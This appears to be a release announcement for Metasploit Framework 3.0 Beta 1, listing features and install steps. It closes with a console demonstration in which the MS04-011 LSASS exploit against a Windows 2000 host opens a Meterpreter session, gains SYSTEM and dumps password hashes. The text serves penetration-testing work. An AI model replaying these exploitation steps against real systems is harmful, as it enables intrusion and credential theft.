We are happy to announce that the first beta release of the 3.0 tree is now ready for download. This release contains numerous bug fixes and improvements to the previous alpha release. 3.0 Beta 1 is fully compatible with Linux, BSD, Mac OS X, and Windows using our custom Cygwin installer. If you would like to discuss the beta release with other users, please subscribe to the framework-beta mailing list by sending a blank email to framework-beta-subscribe[at]metasploit.com.

If you are attending the Black Hat security conference in Las Vegas, I will be presenting on the new functionality available in this release at 4:45pm on August 2nd. This talk is part of the /dev/random track and is entitled Metasploit Reloaded.

Some quick highlights compared to version 2.6:
- All modules are organized in a directory heirarchy
- Common Meterpreter modules have been merged into 'stdapi'
- New Meterpreter features significantly help with penetration testing
- New type of "passive" exploits (browser, sniffer, ids attacks)
- Denial of service modules (ms05-035 and unpatched RRAS)
- Support for multiple shells per exploit with passive modules
- Support for recent browser bugs :-)

This release can be obtained from the Metasploit web site.

Unix users may need to install the openssl and zlib ruby modules for the
Framework to load. If you are using Ubuntu, run the following commands:
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby

User of other distributions or Unix flavors may want to grab the latest version of ruby from www.ruby-lang.org and build it from source.

Mac OS X users should install GNU Readline prior to rebuilding Ruby. Although it is possible to use the Framework without readline, the tab completion features in msfconsole work great and can save quite a bit of time.

Windows users will need to exit out of any running Cygwin-based applications before running the installer or using the Framework. We really tried to work with the native ruby interpreter for Windows, but numerous io/readline/stdin issues came up and we will try again once the code base gets a little more stable.

A quick demonstration of using msfconsole with meterpreter:

____________
< metasploit >
------------
       \   ,__,
        \  (oo)____
           (__)    )              ||--|| *

       =[ msf v3.0-beta-1
-- --=[ 86 exploits - 90 payloads
-- --=[ 16 encoders - 4 nops
       =[ 4 aux

msf > use exploit/windows/smb/ms04_011_lsass
msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106
RHOST => 192.168.0.106
msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler..
[*] Getting OS information...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.145:41829 ->
192.168.0.106:4444)
[*] The DCERPC service did not reply to our request

Loading extension stdapi...success.
meterpreter > getuid
Server username: SYSTEM

meterpreter > use priv
Loading extension priv...success.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[snip]:::

meterpreter > cd c:meterpreter > ls

Listing: c:
============

Mode              Size       Type  Last modified                 Name
----              ----       ----  -------------                 ----
100444/r--r--r--  0          fil   Sat Oct 09 11:03:03 CDT 2004  IO.SYS
100444/r--r--r--  0          fil   Sat Oct 09 11:03:03 CDT 2004  MSDOS.SYS
40777/rwxrwxrwx   0          dir   Sat Oct 09 11:21:49 CDT 2004  RECYCLER
40777/rwxrwxrwx   0          dir   Sat May 21 18:12:30 CDT 2005  WINNT
100666/rw-rw-rw-  195        fil   Sat Oct 09 05:38:57 CDT 2004  boot.ini
100444/r--r--r--  214416     fil   Mon Dec 06 14:00:00 CST 1999  ntldr
[ snip ]

meterpreter > ps

Process list
============

    PID Name Path
    --- ---- ----
    176   smss.exe           \SystemRoot\System32\smss.exe
    200   csrss.exe          \??\C:\WINNT\system32\csrss.exe
    224   winlogon.exe       \??\C:\WINNT\system32\winlogon.exe
    252   services.exe       C:\WINNT\system32\services.exe
    264   lsass.exe          C:\WINNT\system32\lsass.exe
    440   svchost.exe        C:\WINNT\system32\svchost.exe
[ snip ]
    1804  wins.exe           C:\WINNT\System32\wins.exe
    2676  logon.scr          C:\WINNT\system32\logon.scr

meterpreter > kill 2676
Killing: 2676